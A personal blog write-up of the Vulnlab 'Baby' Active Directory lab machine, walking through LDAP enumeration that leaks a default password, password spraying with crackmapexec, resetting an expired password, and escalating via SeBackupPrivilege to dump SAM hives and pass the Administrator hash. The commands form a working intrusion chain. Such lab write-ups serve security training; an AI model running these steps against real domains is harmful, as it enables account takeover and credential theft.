Post

Baby(VL) Writeup

Posted Updated
img of the machine
img of the machine
By 9 min read

Baby (Vulnab)

Machine information

FeatureBaby 
TTL127 
Difficulty:Easy 
issueMisconfiguration 
FromVulnab 
IP10.10.64.243 

Information Recon

Nmap Summary

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: baby.vl0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
3389/tcp  open  ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2023-07-23T22:16:27+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=BabyDC.baby.vl
| Not valid before: 2023-07-22T22:07:41
|_Not valid after:  2024-01-21T22:07:41
| rdp-ntlm-info: 
|   Target_Name: BABY
|   NetBIOS_Domain_Name: BABY
|   NetBIOS_Computer_Name: BABYDC
|   DNS_Domain_Name: baby.vl
|   DNS_Computer_Name: BabyDC.baby.vl
|   Product_Version: 10.0.20348
|_  System_Time: 2023-07-23T22:15:47+00:00
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        .NET Message Framing
64158/tcp open  msrpc         Microsoft Windows RPC
64172/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: BABYDC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   311: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2023-07-23T22:15:48
|_  start_date: N/A

Nmap Tcp Scan command

1

nmap -p- --open --min-rate 5000 -Pn -n -vvv 10.10.64.2432 -oG AllPorts

Port Analysis

Port 3268- Ldap

What is Ldap? LDAP (Lightweight Directory Access Protocol) is a network protocol used to access and manage directory information. It provides a hierarchical structure to store and organize data, such as user accounts, passwords, and network resources. LDAP is commonly used for centralized authentication, allowing users to log in once and access various services securely. It simplifies the management of user information across multiple systems, making it ideal for large-scale networks. LDAP servers store data in a tree-like structure, with each node representing an entry containing attributes like names, addresses, and permissions. Its lightweight design and efficiency make it a popular choice for directory services in modern IT infrastructures.

This service contains important information that can grant access to the system. However, to access it, credentials are required. Currently, we don’t have the credentials, so we can attempt to access it anonymously using the following command:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61

ldapsearch -x -b "dc=baby,dc=vl" "*" -H ldap://10.10.64.243

description: Built-in account for guest access to the computer/domain
distinguishedName: CN=Guest,CN=Users,DC=baby,DC=vl
instanceType: 4
--
description: All workstations and servers joined to the domain
distinguishedName: CN=Domain Computers,CN=Users,DC=baby,DC=vl
instanceType: 4
--
description: Members of this group are permitted to publish certificates to th
 e directory
distinguishedName: CN=Cert Publishers,CN=Users,DC=baby,DC=vl
--
description: All domain users
distinguishedName: CN=Domain Users,CN=Users,DC=baby,DC=vl
instanceType: 4
--
description: All domain guests
distinguishedName: CN=Domain Guests,CN=Users,DC=baby,DC=vl
instanceType: 4
--
description: Members in this group can modify group policy for the domain
member: CN=Administrator,CN=Users,DC=baby,DC=vl
distinguishedName: CN=Group Policy Creator Owners,CN=Users,DC=baby,DC=vl
--
description: Servers in this group can access remote access properties of user
 s
distinguishedName: CN=RAS and IAS Servers,CN=Users,DC=baby,DC=vl
--
description: Members in this group can have their passwords replicated to all 
 read-only domain controllers in the domain
distinguishedName: CN=Allowed RODC Password Replication Group,CN=Users,DC=baby
--
description: Members in this group cannot have their passwords replicated to a
 ny read-only domain controllers in the domain
member: CN=Read-only Domain Controllers,CN=Users,DC=baby,DC=vl
--
description: Members of this group are Read-Only Domain Controllers in the ent
 erprise
distinguishedName: CN=Enterprise Read-only Domain Controllers,CN=Users,DC=baby
--
description: Members of this group that are domain controllers may be cloned.
distinguishedName: CN=Cloneable Domain Controllers,CN=Users,DC=baby,DC=vl
instanceType: 4
--
description: Members of this group are afforded additional protections against
  authentication security threats. See http://go.microsoft.com/fwlink/?LinkId=
 298939 for more information.
--
description: DNS Administrators Group
distinguishedName: CN=DnsAdmins,CN=Users,DC=baby,DC=vl
instanceType: 4
--
description: DNS clients who are permitted to perform dynamic updates on behal
 f of some other clients (such as DHCP servers).
distinguishedName: CN=DnsUpdateProxy,CN=Users,DC=baby,DC=vl
--
description: Set initial password to BabyStart123!
givenName: Teresa
distinguishedName: CN=Teresa Bell,OU=it,DC=baby,DC=vl

It seems that we can obtain information anonymously, and the most interesting part is the last line, which gives us the credentials of a user named ‘teresa.bell’ and her password ‘BabyStart123!’. So we can try to access the smb or ldap with these credentials.

1
2
3

crackmapexec  ldap 10.10.64.2432 -u 'teresa.bell' -p 'BabyStart123!'

SMB  10.10.64.243 445  BABYDC  [-] baby.vl\Teresa Bell:BabyStart123! Error connecting to

However, those don’t seem to be the correct credentials for that account, but we can confirm that this password is indeed associated with an account. So our next plan is to create a txt file with the usernames and try them one by one. I created the following file:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34

Administrator
Guest
krbtgt
Domain Computers
Domain Controllers
Schema Admins
Enterprise Admins
Cert Publishers
Domain Admins
Domain Users
Domain Guests
Group Policy Creator Owners
RAS and IAS Servers
Allowed RODC Password Replication Group
Denied RODC Password Replication Group
Read-only Domain Controllers
Enterprise Read-only Domain Controllers
Cloneable Domain Controllers
Protected Users
Key Admins
Enterprise Key Admins
DnsAdmins
DnsUpdateProxy
dev
jacqueline.barnett
ashley.webb
hugh.george
leonard.dyer
connor.wilkinson
joseph.hughes
kerry.wilson
teresa.bell
caroline.robinson
ian.walker

Now, using crackmapexec, we will try to log in with the users from the list using the password ‘BabyStart123!’:

1
2
3

crackmapexec smb 10.10.64.243 -u users.txt -p 'BabyStart123!' 
SMB         10.10.64.243   445    BABYDC           [-]
baby.vl\caroline.robinson:BabyStart123! STATUS_PASSWORD_MUST_CHANGE

NICE! We found the user associated with the password. However, there’s something curious… That STATUS_PASSWORD_MUST_CHANGE means that the account needs to change the password; this usually happens when you are given a temporary password.

Explotation

To take advantage of this, we can use the ‘smbpasswd’ tool to change the password to something of our choosing.

1
2
3
4

smbpasswd -U BABY/caroline.robinson -r 10.10.104.152
Old SMB password:BabyStart123!
New SMB password:Star@123!
Retype new SMB password:Star@123!

Now, we just need to log in to the machine using evil-winrm:

1

evil-winrm -i 10.10.64.243 -u 'caroline.robinson' -p 'Star@123!'

And… OH NO!! AN ERROR!!!

alt text

After investigating, I discovered that AD has a script that resets everything every x minutes. So, we need to create a script that changes the password constantly. I created the following one-liner based on one from https://secure77.de/. Now, the main problem with this script is that you have to keep changing the new password manually, so I recommend changing just one letter to a special character.

1

`export current_password='BabyStart123!'; export new_password='Start124!'; (echo "$current_password"; echo "$new_password"; echo "$new_password") | smbpasswd -s -U caroline.robinson -r 10.10.64.243 && evil-winrm -i 10.10.64.243 -u caroline.robinson -p "$new_password"`

By using this, we can log into the machine, and we found the first flag VL{b2c61****}.

Privilege Escalation

Now that we are a user, we need to find a way to become a privileged user. To do this, we need to follow these steps:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45

whoami /all 

USER INFORMATION
----------------

User Name              SID
====================== ==============================================
baby\caroline.robinson S-1-5-21-1407081343-4001094062-1444647654-1111


GROUP INFORMATION
-----------------

Group Name                                 Type             SID                                            Attributes
========================================== ================ ============================================== ==================================================
Everyone                                   Well-known group S-1-1-0                                        Mandatory group, Enabled by default, Enabled group
BUILTIN\Backup Operators                   Alias            S-1-5-32-551                                   Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                              Alias            S-1-5-32-545                                   Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias            S-1-5-32-554                                   Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users            Alias            S-1-5-32-580                                   Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                       Well-known group S-1-5-2                                        Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users           Well-known group S-1-5-11                                       Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization             Well-known group S-1-5-15                                       Mandatory group, Enabled by default, Enabled group
BABY\it                                    Group            S-1-5-21-1407081343-4001094062-1444647654-1109 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication           Well-known group S-1-5-64-10                                    Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level       Label            S-1-16-12288


PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeBackupPrivilege             Back up files and directories  Enabled
SeRestorePrivilege            Restore files and directories  Enabled
SeShutdownPrivilege           Shut down the system           Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled


USER CLAIMS INFORMATION
-----------------------

User claims unknown.

The important part here is that we are part of the groups SeBackupPrivilege and SeRestorePrivilege. Following the steps in this article https://www.hackingarticles.in/windows-privilege-escalation-sebackupprivilege/, we can perform the following commands:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18

Part 1
cd c:\
mkdir Temp
reg save hklm\sam c:\Temp\sam
reg save hklm\system c:\Temp\system

Part 2

cd Temp
download sam
download system

Part 3

pypykatz registry --sam sam system

...
Administrator:500:aad3b435b51404eeaad3b435b51404ee:8d992faed38128ae85e95fa35868bb43::

Now, we have the NTLM Hash, which allows us to log in. We can do it as follows:

1

evil-winrm -i 10.10.64.243 -u 'Administrator' -H '8d992faed38128ae85e95fa35868bb43'

With this, we can find the root flag VL{b8512958}.

Conclusion

In conclusion, “Baby” on the Vulnab environment holds significant offensive value. This machine offers an excellent opportunity to enhance skills in reconnaissance, enumeration, and exploitation in Windows environments, particularly in the context of Active Directory.

It is crucial to emphasize the importance of adhering to secure practices while configuring services, such as avoiding anonymous access when unnecessary, using strong passwords, and ensuring that users do not possess unnecessary privileges. The configuration vulnerability that allowed anonymous access to the LDAP service proved to be a critical point for gathering information and advancing in privilege escalation.

Furthermore, the technique of constantly changing passwords and utilizing tools like pypykatz to extract NTLM passwords are compelling strategies to maintain access and acquire privileged credentials.

Overall, “Baby” delivers a valuable learning experience to improve offensive security skills and underscores the significance of implementing sound security practices to safeguard enterprise environments.

Vulnab, EJPT
CTFs Vulnab personal blog WriteUP ctf Baby.VL Vulnab ejpt-like
This post is licensed under CC BY 4.0 by the author.